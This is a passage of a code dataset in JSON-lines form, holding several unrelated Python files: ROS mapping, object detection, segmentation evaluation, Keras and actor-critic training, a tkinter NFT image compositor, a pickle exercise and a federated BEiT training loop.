rospy.get_param(\"~frame_id\")\n print(\"Initializing TSDF Server\")\n self.base_frame_id = rospy.get_param(\"~base_frame_id\")\n self.frame_id = rospy.get_param(\"~frame_id\")\n self.length = rospy.get_param(\"~length\")\n self.resolution = rospy.get_param(\"~resolution\")\n self.depth_scaling = rospy.get_param(\"~depth_scaling\")\n self.cam_frame_id = rospy.get_param(\"~camera/frame_id\")\n info_topic = rospy.get_param(\"~camera/info_topic\")\n self.depth_topic = rospy.get_param(\"~camera/depth_topic\")\n print('before wait')\n msg = rospy.wait_for_message(info_topic, CameraInfo)\n print('after wait')\n self.intrinsic = from_camera_info_msg(msg)\n center = np.r_[0.5, 0.0, 0.2]\n length = 0.3\n xyz = center - np.r_[0.5 * length, 0.5 * length, 0.0]\n self.T_base_task = Transform.from_translation(xyz)\n\n def init_topics(self):\n print('Init topic')\n self.scene_cloud_pub = rospy.Publisher(\"/tsdf_server/scene_cloud\", PointCloud2, queue_size=1)\n self.map_cloud_pub = rospy.Publisher(\"map_cloud\", PointCloud2, queue_size=1)\n rospy.Subscriber(self.depth_topic, Image, self.sensor_cb)\n\n def advertise_services(self):\n rospy.Service(\"reset_map\", std_srvs.srv.Empty, self.reset)\n rospy.Service(\"toggle_integration\", std_srvs.srv.SetBool, self.toggle)\n rospy.Service(\"get_scene_cloud\", vgn.srv.GetSceneCloud, self.get_scene_cloud)\n rospy.Service(\"get_map_cloud\", vgn.srv.GetMapCloud, self.get_map_cloud)\n\n def reset(self, req):\n self.tsdf = UniformTSDFVolume(self.length, self.resolution)\n return std_srvs.srv.EmptyResponse()\n\n def toggle(self, req):\n self.integrate = req.data\n return std_srvs.srv.SetBoolResponse(success=True)\n\n def sensor_cb(self, msg):\n # print('tsdf integration step -------------------')\n if self.integrate:\n depth = (\n self.cv_bridge.imgmsg_to_cv2(msg).astype(np.float32)\n * self.depth_scaling\n )\n extrinsic = tf.lookup(\n self.cam_frame_id, self.base_frame_id, msg.header.stamp, rospy.Duration(0.1) # was 0.1\n )\n self.tsdf.integrate(depth, self.intrinsic, extrinsic * self.T_base_task)\n\n # self.get_map_cloud(vgn.srv.GetMapCloud)\n\n def get_scene_cloud(self, req):\n scene_cloud = self.tsdf.get_scene_cloud()\n points = np.asarray(scene_cloud.points)\n msg = to_cloud_msg(self.frame_id, points)\n self.scene_cloud_pub.publish(msg)\n res = vgn.srv.GetSceneCloudResponse()\n res.scene_cloud = msg\n return res\n\n def get_map_cloud(self, req):\n map_cloud = self.tsdf.get_map_cloud()\n points = np.asarray(map_cloud.points)\n distances = np.asarray(map_cloud.colors)[:, [0]]\n msg = to_cloud_msg(self.frame_id, points, distances=distances)\n self.map_cloud_pub.publish(msg)\n res = vgn.srv.GetMapCloudResponse()\n res.voxel_size = self.tsdf.voxel_size\n res.map_cloud = msg\n return res\n\n\nif __name__ == \"__main__\":\n rospy.init_node(\"tsdf_server\")\n UniformTSDFServer()\n rospy.spin()\n # server.run()\n","repo_name":"Pitcherrr/active_search","sub_path":"src/active_search/nodes/tsdf_server.py","file_name":"tsdf_server.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72781577493","text":"import tensorflow as tf\nimport config\nimport numpy as np\n\n\nclass DetectionObject:\n def __init__(self, left, top, right, bottom, class_id, probability):\n self.left = left\n self.top = top\n self.right = right\n self.bottom = bottom\n self.class_id = class_id\n self.probability = probability\n\n\nclass Detector:\n def __init__(self):\n self.g = None\n self.session = 
None\n self.image_tensor = None\n self.detection_boxes = None\n self.detection_scores = None\n self.detection_classes = None\n self.num_detections = None\n\n def load(self, graph_file_path):\n ret = False\n\n detection_graph = tf.Graph()\n with detection_graph.as_default():\n\n # GraphDef can load serialzied graph, such as pretrained model data.\n # We import specified graph here with tf.import_graph_def function.\n graph_def = tf.GraphDef()\n with tf.gfile.GFile(graph_file_path, 'rb') as fid:\n serialized_graph = fid.read()\n graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(graph_def, name='')\n\n self.session = tf.Session(graph=detection_graph) \n self.image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n self.detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n self.detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n self.detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n self.num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n ret = True\n\n return ret\n\n def detect(self, image):\n height, width, depth = image.shape\n image_np_expanded = np.expand_dims(image, axis=0)\n\n param_array = [\n self.detection_boxes,\n self.detection_scores,\n self.detection_classes,\n self.num_detections\n ]\n (boxes, scores, classes, num) = self.session.run(param_array, feed_dict={self.image_tensor: image_np_expanded})\n\n objects = []\n\n idx = 0\n for score in scores[0]:\n if score > config.CONFIDENCE:\n class_id = classes[0][idx]\n if class_id == config.TARGET_CLASS:\n ymin = boxes[0][idx][0]\n xmin = boxes[0][idx][1]\n ymax = boxes[0][idx][2]\n xmax = boxes[0][idx][3]\n\n (left, top, right, bottom) = (\n int(xmin * width), \n int(ymin * height), \n int(xmax * width),\n int(ymax * height)\n )\n\n objects.append(DetectionObject(left, top, right, bottom, class_id, score))\n idx += 1\n else:\n pass\n else:\n break\n\n if config.VERBOSE_LOG:\n for obj in objects:\n print(f\"({obj.left}, {obj.top}), ({obj.right}, {obj.bottom}), class : {obj.class_id}, probability : {obj.probability}\")\n\n return objects\n","repo_name":"yukihirokatagiri/track","sub_path":"core/detection_graph.py","file_name":"detection_graph.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22644332921","text":"#!/usr/bin/env python\nimport argparse\nimport chainer\nimport time\nimport chainer.links as L\nfrom chainer import training\nfrom chainer.training import extensions\nfrom chainer.datasets import get_cifar10\nimport chainermn\nimport numpy as np\n\nfrom models.alexnet_model_parallel import AlexNet\nfrom config import config\n\n\n\ndef main():\n comm = chainermn.create_communicator(\"naive\")\n\n parser = argparse.ArgumentParser(description='Chainer example: MNIST')\n parser.add_argument('--device', '-d', type=str, default='-1',\n help='Device specifier. Either ChainerX device '\n 'specifier or an integer. If non-negative integer, '\n 'CuPy arrays with specified device id are used. 
If '\n 'negative integer, NumPy arrays are used')\n parser.add_argument('--snapshot', '-s',\n default='result/snapshot_iter_12000',\n help='The path to a saved snapshot (NPZ)')\n parser.add_argument('--unit', '-u', type=int, default=1000,\n help='Number of units')\n group = parser.add_argument_group('deprecated arguments')\n group.add_argument('--gpu', '-g', dest='device',\n type=int, nargs='?', const=0,\n help='GPU ID (negative value indicates CPU)')\n args = parser.parse_args()\n\n device = chainer.get_device(args.device)\n\n print('Device: {}'.format(device))\n print('# unit: {}'.format(args.unit))\n print('')\n\n device.use()\n\n # Create a same model object as what you used for training\n model = AlexNet(comm, num_classes=10)\n optimizer = chainer.optimizers.MomentumSGD(0.001)\n optimizer.setup(model)\n\n # # Load saved parameters from a NPZ file of the Trainer object\n # try:\n # chainer.serializers.load_npz(\n # \"result/snapshot_iter_12000\", model, path='updater/model:main/predictor/')\n # except Exception:\n # chainer.serializers.load_npz(\n # args.snapshot, model, path='predictor/')\n\n #model.to_device(device)\n\n # Prepare data\n train, test = get_cifar10()\n x = test.__getitem__(0)[0]\n x = np.expand_dims(x, axis=0)\n print(x.shape)\n with chainer.using_config('train', False):\n prediction = model.forward(x)\n\n print('Prediction:', prediction)\n #print('Answer:', answer)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ankahira/PyPi","sub_path":"chainer/inference_cifar.py","file_name":"inference_cifar.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8601809235","text":"# Imports PIL module\r\n\r\nimport os\r\nimport itertools\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog as fd\r\nfrom PIL import Image\r\n\r\n#File location naming\r\nclass ing:\r\n def __init__(self):\r\n self.pen = \"\"\r\n def select_file(self):\r\n self.pen = (fd.askdirectory(title='Choose a file'))\r\n \r\n\r\n#ends program without printing\r\ndef end():\r\n exit(1)\r\n\r\n\r\n#The file locations of the three parts to an NFT: background, base image, components\r\n#Background\r\nblap = ing()\r\n#Base\r\nblap2 = ing()\r\n#Components\r\nblap3 = ing()\r\n\r\n#Create and format the GUI\r\nroot = Tk()\r\nroot.title(\"Nft Printer\")\r\nfrm = ttk.Frame(root, padding=10)\r\nfrm.grid()\r\n\r\n#Button implementation\r\n\r\n#Sets Background\r\nttk.Button(frm, text=\"Background\", command = blap.select_file).grid(column=1, row=0)\r\n#Sets Base\r\nttk.Button(frm, text=\"Base\", command = blap2.select_file).grid(column=2, row=0)\r\n#Sets Components\r\nttk.Button(frm, text=\"Components\", command = blap3.select_file).grid(column=3, row=0)\r\n#Ends program and does not print\r\nttk.Button(frm, text=\"Quit\", command = end).grid(column=2, row=2)\r\n#Ends the GUI and prints\r\nttk.Button(frm, text=\"Execute\", command = root.destroy).grid(column=2, row=1)\r\n#Gives a preview of what the images will look like\r\n\r\n\r\n#Loops until the GUI is executed\r\nroot.mainloop()\r\n\r\n\r\ncomponentList =[]\r\nfor x in os.listdir(blap3.pen):\r\n newlist = []\r\n for y in os.listdir(blap3.pen + chr(92) + x):\r\n newlist.append(blap3.pen +chr(92)+ x +chr(92) + y)\r\n componentList.append(newlist)\r\n\r\n#Create the list for background images and base images\r\nbaseList = os.listdir(blap2.pen)\r\nbackgroundList = os.listdir(blap.pen)\r\n\r\n#Contains a list of lists each with the 
directory for each of the combinations of components\r\nImgList = list(itertools.product(backgroundList, baseList, *componentList))\r\n\r\n\r\n#prints The NFTs\r\nfor i in list(ImgList):\r\n\r\n background = Image.open((blap.pen+chr(92) + i[0]), mode='r')\r\n base = Image.open((blap2.pen+chr(92) + i[1]), mode='r')\r\n background.paste(base, base)\r\n for x in range(2,(len(i))):\r\n comp = Image.open((i[x]), mode='r')\r\n background.paste(comp,comp)\r\n background.show()\r\n\r\nexit(1)\r\n","repo_name":"IneedtoGitaJob/Nft","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23520691952","text":"import argparse\nimport os\nfrom glob import glob\n \nimport torch\nimport torch.backends.cudnn as cudnn\nimport yaml\nimport numpy as np \nimport torchvision.transforms as transforms \nfrom tqdm import tqdm\n\nimport archs\nfrom dataset import Dataset\nfrom metrics import dice_coef, Jaccord, HD, ASD\n#from utils import AverageMeter\nfrom collections import OrderedDict\nfrom utils import test_single_case, AverageMeter \n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--model_dir', default='/raid/D/bayes/bayes_AtriaSeg_8/',\n help='model directory')\n parser.add_argument('--input_crop', default=128, type=int,\n help='image width')\n parser.add_argument('--depth', default=32, type=int,\n help='image depth')\n parser.add_argument('--test_txt', default='./val_AtriaSeg.txt',\n help='text file showing the patient id used for validation')\n parser.add_argument('--gpu_id', default=0, type=int,\n metavar='N', help='setting gpu id') \n parser.add_argument('--num_classes', default=2, type=int,\n help='number of classes')\n \n args = parser.parse_args()\n\n return args\n \n\ndef data_collate(batch):\n input=None\n target = None\n input_paths = None\n total_num =0\n num_per_patient = []\n for info in batch:\n if total_num==0:\n input = torch.from_numpy(info[0]).unsqueeze(0)\n target = torch.from_numpy(info[1]).unsqueeze(0)\n input_paths = info[3]\n else:\n input = torch.cat((input, torch.from_numpy(info[0]).unsqueeze(0)))\n target = torch.cat((target, torch.from_numpy(info[1]).unsqueeze(0)))\n input_paths = np.dstack((input_paths, info[3]))\n num_per_patient.append(info[2])\n total_num+=1\n\n return input.float(), target, num_per_patient, input_paths, info[4]\n\n\n\n\ndef main():\n args = parse_args()\n model_dir = args.model_dir\n\n yml = os.path.join(model_dir, 'config.yml')\n\n with open(yml, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n print('-'*20)\n for key in config.keys():\n print('%s: %s' % (key, str(config[key])))\n print('-'*20)\n\n\n cudnn.benchmark = True\n \n print(\"=> creating model %s\" % config['arch'])\n model_seg = archs.__dict__[config['arch']](args.num_classes,\n config['input_channels'])\n \n \n model_seg = model_seg.cuda()\n \n model_seg_path = os.path.join(model_dir, 'model_seg_240.pth')\n\n checkpoint = torch.load(model_seg_path) \n pretrain_dict = checkpoint['state_dict']\n \n new_dict = OrderedDict()\n\n for k, v in pretrain_dict.items():\n if k.startswith(\"module\"):\n k = k[7:]\n new_dict[k] = v\n \n model_dict = model_seg.state_dict()\n model_dict.update(new_dict)\n model_seg.load_state_dict(model_dict)\n\n\n model_seg.eval()\n\n torch.cuda.set_device(args.gpu_id)\n\n test_transform = transforms.Compose([ \n transforms.Resize(256),\n transforms.CenterCrop(160),\n ])\n\n test_dataset = 
Dataset(\n data_txt = args.test_txt,\n img_ext = 'png',\n mask_ext= 'png',\n semi_setting=False, \n label_factor_semi = None, \n transform=test_transform,\n rotate_flip=False,\n random_whd_crop = False,\n crop_hw = 128,\n depth = None)\n\n\n test_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=1,\n shuffle=False,\n collate_fn = data_collate,\n num_workers=config['num_workers'],\n drop_last=False)\n\n avg_meters = {'dice': AverageMeter(),\n 'jaccord': AverageMeter(), \n 'hd95': AverageMeter(),\n 'asd': AverageMeter()}\n\n with torch.no_grad():\n for input, target, _, _, _, in tqdm(test_loader, total=len(test_loader)):\n input = input.cuda()\n target = target.cuda()\n T = 1\n out_seg = None\n out_seg_ = None\n \n for ii in range(T):\n input = input.cuda(non_blocking=True)\n target = target.cuda(non_blocking=True)\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n input_ = torch.transpose(input_var, 1, 2)\n target_ = torch.transpose(target_var, 1, 2)\n out_map, score_map = test_single_case(model_seg, input_, 8, 8, patch_size=(args.input_crop, args.input_crop, args.depth), num_classes=args.num_classes) \n if ii == 0:\n out_seg = score_map\n out_seg_ = out_map\n else:\n out_seg = out_seg + score_map\n out_seg_ = out_seg_ + out_map\n\n output = out_seg/T \n\n dice = dice_coef(output, target_)\n jaccord = Jaccord(output, target_)\n hd = HD(output, target_)\n asd = ASD(output, target_)\n \n avg_meters['dice'].update(dice, input.size(0))\n avg_meters['jaccord'].update(jaccord, input.size(0))\n avg_meters['hd95'].update(hd, input.size(0))\n avg_meters['asd'].update(asd, input.size(0))\n \n\n\n print('Dice: %.4f' % avg_meters['dice'].avg)\n print('Jaccord: %.4f' % avg_meters['jaccord'].avg)\n print('hd95: %.4f' % avg_meters['hd95'].avg)\n print('asd: %.4f' % avg_meters['asd'].avg)\n\n torch.cuda.empty_cache()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tejas-parmar-24/GBDL","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"16413744089","text":"import pandas\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Flatten, InputLayer\nfrom keras import backend as K\nfrom os import path\nfrom distutils.version import LooseVersion as LV\nfrom keras import __version__\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom keras.optimizers import SGD\nfrom sklearn import preprocessing, metrics\n\nsns.set()\n\n\ndef recall_m(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n recall = true_positives / (possible_positives + K.epsilon())\n return recall\n\n\ndef precision_m(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision\n\n\ndef f1_m(y_true, y_pred):\n precision = precision_m(y_true, y_pred)\n recall = recall_m(y_true, y_pred)\n return 2 * ((precision * recall) / (precision + recall + K.epsilon()))\n\n\nprint('Using Keras version:', __version__, 'backend:', K.backend())\nassert (LV(__version__) >= LV(\"2.0.0\"))\n\noutput = 'outputs/mlp_multiclass/'\n# Data preprocessing\nif not path.exists(output + 'X.npy'):\n vector_path = 
'outputs/subject_classification_dataset_0.txt'\n v = np.loadtxt(vector_path, delimiter=',', dtype='str', encoding='utf8')\n np.random.shuffle(v)\n # v = v[:100,:]\n X = v[:, :-1].astype('float')\n Y = v[:, -1]\n Y = np.array(pandas.get_dummies(Y))\n # Y = Y.values.argmax(1)\n np.save(output + 'X', X)\n np.save(output + 'Y', Y)\nelse:\n X = np.load(output + 'X.npy')\n Y = np.load(output + 'Y.npy')\n\n# Y = np.array(Y)\n# print(Y)\n# print(Y.shape)\nY = Y[:, 1:]\n# X = X[:, :300]\nX = preprocessing.scale(X)\n# print(X)\n# print(Y)\n# print(X.shape)\n# print(Y.shape)\n# X = X[93145:93245, :]\n# Y = Y[93145:93245]\n# Y = (Y > 10).astype(int)\nrecord_count = X.shape[0]\nclass_count = Y.shape[1]\ninput_size = X.shape[1]\ntrain_size = int(0.2 * record_count)\nX_train = X[:train_size, :]\nX_train = X_train.astype('float32')\nX_test = X[train_size:, :]\nY_train = Y[:train_size, :]\nY_test = Y[train_size:, :]\n\nprint()\nprint('data loaded: train:', len(X_train), 'test:', len(X_test))\n\n# Model architecture\nmodel = Sequential()\nmodel.add(InputLayer(input_shape=(input_size,)))\nmodel.add(Dense(units=100))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.2))\n# model.add(Dense(units=40))\n# model.add(Activation('relu'))\n# model.add(Dropout(0.4))\nmodel.add(Dense(units=class_count, activation='softmax'))\n\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='sgd',\n metrics=['accuracy'])\n\nprint(model.summary())\n\n# Learning\nepochs = 20 # one epoch with simple model takes about 4 seconds\n\nhistory = model.fit(X_train, Y_train,\n epochs=epochs,\n batch_size=4,\n verbose=2)\n\n# Curves\nplt.figure(figsize=(5, 3))\nplt.plot(history.epoch, history.history['loss'])\nplt.title('loss')\n\nmodel.save('outputs/mlp_model')\n# plt.show()\n\n\n# plt.figure(figsize=(5, 3))\n# plt.plot(history.epoch, history.history['acc'])\n# plt.title('accuracy')\n\n# Inference\nscores = model.evaluate(X_test, Y_test, verbose=2)\nfor i in range(1, len(scores)):\n print(\"%s: %.2f%%\" % (model.metrics_names[i], scores[i] * 100))\n\n# predictions = model.predict(X_test)\n#\n# show_failures(predictions)\n","repo_name":"ftmkk/WAN2Vec_Tarvajeh","sub_path":"test_mlp_multiclass.py","file_name":"test_mlp_multiclass.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6381456337","text":"import torch\nfrom torch import optim, nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom util.replay_buffer import ReplayBuffer\n\n\nclass Actor(nn.Module):\n\tdef __init__(self, input_dims, fc1_dims, fc2_dims, n_actions, lr=1e-3):\n\t\tsuper(Actor, self).__init__()\n\t\tself.fc1 = nn.Linear(*input_dims, fc1_dims)\n\t\tself.fc2 = nn.Linear(fc1_dims, fc2_dims)\n\t\tself.fc3 = nn.Linear(fc2_dims, n_actions)\n\t\tself.optimizer = optim.Adam(self.parameters(), lr)\n\t\tself.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\t\tself.to(self.device)\n\n\tdef loss(self, y_pred, y_true, q_value):\n\t\ty_pred = torch.clip(y_pred, 1e-8, 1 - 1e-8)\n\t\tlog_prob = y_true * torch.log(y_pred)\n\t\treturn torch.sum(-q_value * log_prob)\n\n\tdef forward(self, x):\n\t\tx = F.relu(self.fc1(x))\n\t\tx = F.relu(self.fc2(x))\n\t\tx = F.softmax(self.fc3(x), dim=1)\n\t\treturn x\n\n\nclass Critic(nn.Module):\n\tdef __init__(self, input_dims, fc1_dims, fc2_dims, n_actions, lr=1e-3):\n\t\tsuper(Critic, self).__init__()\n\t\tself.fc1 = nn.Linear(*input_dims, fc1_dims)\n\t\tself.fc2 = nn.Linear(fc1_dims, 
fc2_dims)\n\t\tself.fc3 = nn.Linear(fc2_dims, n_actions)\n\t\tself.loss = nn.MSELoss()\n\t\tself.optimizer = optim.Adam(self.parameters(), lr)\n\t\tself.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\t\tself.to(self.device)\n\n\tdef forward(self, x):\n\t\tx = F.relu(self.fc1(x))\n\t\tx = F.relu(self.fc2(x))\n\t\tx = self.fc3(x)\n\t\treturn x\n\n\nclass ActorCriticAgent:\n\tdef __init__(self, gamma, input_dims, fc1_dims, fc2_dims, n_actions, batch_size=32, lr=1e-3):\n\t\tself.gamma = gamma\n\t\tself.n_actions = n_actions\n\t\tself.batch_size = batch_size\n\t\tself.buffer = ReplayBuffer(input_dims, batch_size)\n\t\tself.actor = Actor(input_dims, fc1_dims, fc2_dims, n_actions, lr)\n\t\tself.critic = Critic(input_dims, fc1_dims, fc2_dims, n_actions, lr)\n\t\tself.state_memory = []\n\t\tself.next_state_memory = []\n\t\tself.action_memory = []\n\t\tself.reward_memory = []\n\t\tself.terminal_memory = []\n\n\tdef store_transition(self, state, action, reward, next_state, done):\n\t\tself.state_memory.append(state)\n\t\tself.action_memory.append(action)\n\t\tself.reward_memory.append(reward)\n\t\tself.next_state_memory.append(next_state)\n\t\tself.terminal_memory.append(done)\n\t\tself.buffer.store_transition(state, action, reward, next_state, done)\n\n\tdef clear_memory(self):\n\t\tself.state_memory = []\n\t\tself.next_state_memory = []\n\t\tself.action_memory = []\n\t\tself.reward_memory = []\n\t\tself.terminal_memory = []\n\n\tdef choose_action(self, state):\n\t\tstate = state.astype(np.float32)\n\t\tstate = torch.tensor(state).unsqueeze(0).to(self.actor.device)\n\t\tprob_vec = self.actor(state).ravel().cpu().detach().numpy()\n\t\treturn np.random.choice(self.n_actions, p=prob_vec)\n\n\tdef learn(self):\n\t\t# train actor\n\t\tstates = np.array(self.state_memory).astype(np.float32)\n\t\tstates = torch.tensor(states).to(self.actor.device)\n\t\tprob_vecs = self.actor(states)\n\t\taction_vecs = torch.zeros_like(prob_vecs)\n\t\tindices = np.arange(len(prob_vecs))\n\t\tactions = np.array(self.action_memory)\n\t\taction_vecs[indices, actions] = 1\n\t\tq_values = self.critic(states)[indices, actions].unsqueeze(1)\n\n\t\tself.actor.optimizer.zero_grad()\n\t\tloss = self.actor.loss(prob_vecs, action_vecs, q_values)\n\t\tloss.backward()\n\t\tself.actor.optimizer.step()\n\n\t\t# train critic\n\t\tif len(self.buffer) < self.batch_size:\n\t\t\treturn\n\n\t\tindices = np.arange(self.batch_size)\n\t\tstates, actions, rewards, next_states, dones = self.buffer.batch()\n\t\tstates = torch.tensor(states).to(self.critic.device)\n\t\tnext_states = torch.tensor(next_states).to(self.critic.device)\n\t\trewards = torch.tensor(rewards).to(self.critic.device)\n\t\tdones = torch.tensor(dones).to(self.critic.device)\n\t\tcurrent_qs = self.critic(states)[indices, actions]\n\t\tnext_qs = self.critic(next_states)\n\t\tnext_qs[dones] = 0\n\t\ttarget_qs = rewards + self.gamma * torch.max(next_qs, dim=1)[0]\n\n\t\tself.critic.optimizer.zero_grad()\n\t\tloss = self.critic.loss(current_qs, target_qs)\n\t\tloss.backward()\n\t\tself.critic.optimizer.step()\n","repo_name":"aarunsrinivas/reinforcement-learning","sub_path":"ac/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21935612072","text":"#Create a binary file with roll number, name and marks. 
Input a roll number and update the marks.\n\n\ndef update(filename):\n import pickle\n # Read every existing record first.\n with open(filename, \"rb\") as f:\n data = pickle.load(f)\n a = int(input(\"Enter the roll number\"))\n found = False\n # Records are [roll, name, marks] lists, so update the matching one in place.\n for record in data:\n if a == record[0]:\n record[1] = input(\"Enter Name\")\n record[2] = int(input(\"Enter Marks\"))\n found = True\n if not found:\n print(\"The records don't exist\")\n # Write the whole record list back, not just the updated entry.\n with open(filename, \"wb\") as f:\n pickle.dump(data, f)\n print(\"Updated the records\")\nupdate(\"Sample.dat\")\n","repo_name":"AbhijithGanesh/School-Computer-Science-Lab","sub_path":"4.P4.py","file_name":"4.P4.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"38075308171","text":"# --------------------------------------------------------\n# Based on BEiT code bases\n# Integrate BEiT for Federated Learning\n# Reference: https://github.com/microsoft/unilm/tree/master/beit\n# Author: Rui Yan\n# --------------------------------------------------------\n\nimport math\nfrom typing import Iterable, Optional\n\nimport torch\n\nfrom timm.data import Mixup\nfrom timm.utils import accuracy, ModelEma\n\nimport os\nimport sys\nsys.path.append(os.path.abspath('..'))\nimport util.misc as misc\n\ndef train_class_batch(model, samples, target, criterion):\n outputs = model(samples)\n loss = criterion(outputs, target)\n return loss, outputs\n\n\ndef get_loss_scale_for_deepspeed(model):\n optimizer = model.optimizer\n return optimizer.loss_scale if hasattr(optimizer, \"loss_scale\") else optimizer.cur_scale\n\n\ndef train_one_epoch(args, model: torch.nn.Module, criterion: torch.nn.Module,\n data_loader: Iterable, optimizer: torch.optim.Optimizer,\n device: torch.device, epoch: int, loss_scaler, \n cur_single_client,\n max_norm: float = 0,\n proxy_single_client=None, log_writer=None,\n model_ema: Optional[ModelEma] = None, \n mixup_fn: Optional[Mixup] = None, \n start_steps=None, lr_schedule_values=None, wd_schedule_values=None,\n num_training_steps_per_inner_epoch=None, update_freq=None):\n model.train(True)\n metric_logger = misc.MetricLogger(delimiter=\" \")\n metric_logger.add_meter('lr', misc.SmoothedValue(window_size=1, fmt='{value:.6f}'))\n metric_logger.add_meter('min_lr', misc.SmoothedValue(window_size=1, fmt='{value:.6f}'))\n header = 'Epoch: [{}]'.format(epoch)\n print_freq = 10\n\n if loss_scaler is None:\n model.zero_grad()\n model.micro_steps = 0\n else:\n optimizer.zero_grad()\n\n for data_iter_step, (samples, targets) in enumerate(metric_logger.log_every(data_loader, print_freq, header)):\n step = data_iter_step // update_freq\n if step >= num_training_steps_per_inner_epoch:\n continue\n \n it = start_steps + step # global training iteration\n # print('start_steps: ', start_steps)\n # print('local_step: ', step)\n # print('iter: ', it)\n args.global_step_per_client[proxy_single_client] += 1\n # args.global_step_per_client[proxy_single_client] = it\n # Update LR & WD on the first step of each accumulation cycle only; the parentheses\n # make the `or` bind before the `and`, as the comment intends.\n if (lr_schedule_values is not None or wd_schedule_values is not None) and data_iter_step % update_freq == 0:\n for i, param_group in enumerate(optimizer.param_groups):\n if lr_schedule_values is not None:\n param_group[\"lr\"] = lr_schedule_values[it] * param_group[\"lr_scale\"]\n if wd_schedule_values is not None and param_group[\"weight_decay\"] > 0:\n param_group[\"weight_decay\"] = wd_schedule_values[it]\n\n samples = samples.to(device, non_blocking=True)\n targets = targets.to(device, non_blocking=True)\n\n if mixup_fn is not None:\n samples, 
targets = mixup_fn(samples, targets)\n\n if loss_scaler is None:\n samples = samples.half()\n loss, output = train_class_batch(\n model, samples, targets, criterion)\n else:\n with torch.cuda.amp.autocast():\n loss, output = train_class_batch(\n model, samples, targets, criterion)\n\n loss_value = loss.item()\n\n if not math.isfinite(loss_value):\n print(\"Loss is {}, stopping training\".format(loss_value))\n sys.exit(1)\n\n if loss_scaler is None:\n loss /= update_freq\n model.backward(loss)\n model.step()\n\n if (data_iter_step + 1) % update_freq == 0:\n # model.zero_grad()\n # Deepspeed will call step() & model.zero_grad() automatic\n if model_ema is not None:\n model_ema.update(model)\n grad_norm = None\n loss_scale_value = get_loss_scale_for_deepspeed(model)\n else:\n # this attribute is added by timm on one optimizer (adahessian)\n is_second_order = hasattr(optimizer, 'is_second_order') and optimizer.is_second_order\n loss /= update_freq\n grad_norm = loss_scaler(loss, optimizer, clip_grad=max_norm,\n parameters=model.parameters(), create_graph=is_second_order,\n update_grad=(data_iter_step + 1) % update_freq == 0)\n if (data_iter_step + 1) % update_freq == 0:\n optimizer.zero_grad()\n if model_ema is not None:\n model_ema.update(model)\n loss_scale_value = loss_scaler.state_dict()[\"scale\"]\n \n torch.cuda.synchronize()\n\n if mixup_fn is None:\n class_acc = (output.max(-1)[-1] == targets).float().mean()\n else:\n class_acc = None\n metric_logger.update(loss=loss_value)\n metric_logger.update(class_acc=class_acc)\n metric_logger.update(loss_scale=loss_scale_value)\n min_lr = 10.\n max_lr = 0.\n for group in optimizer.param_groups:\n min_lr = min(min_lr, group[\"lr\"])\n max_lr = max(max_lr, group[\"lr\"])\n\n metric_logger.update(lr=max_lr)\n metric_logger.update(min_lr=min_lr)\n weight_decay_value = None\n for group in optimizer.param_groups:\n if group[\"weight_decay\"] > 0:\n weight_decay_value = group[\"weight_decay\"]\n metric_logger.update(weight_decay=weight_decay_value)\n metric_logger.update(grad_norm=grad_norm)\n \n args.learning_rate_record[proxy_single_client].append(optimizer.param_groups[0]['lr'])\n \n # gather the stats from all processes\n print(\"Averaged stats (before sync):\", metric_logger)\n metric_logger.synchronize_between_processes()\n print(\"Averaged stats:\", metric_logger)\n \n if log_writer is not None:\n for k, v in metric_logger.meters.items():\n if k in ['lr', 'min_lr', 'weight_decay', 'grad_norm', 'loss_scale']:\n log_writer.writer.add_scalar(proxy_single_client +'/opt/'+ k, v.global_avg, log_writer.step) \n elif k in ['loss', 'class_acc', 'loss_scale']:\n # print('hey: ', k, v.global_avg)\n 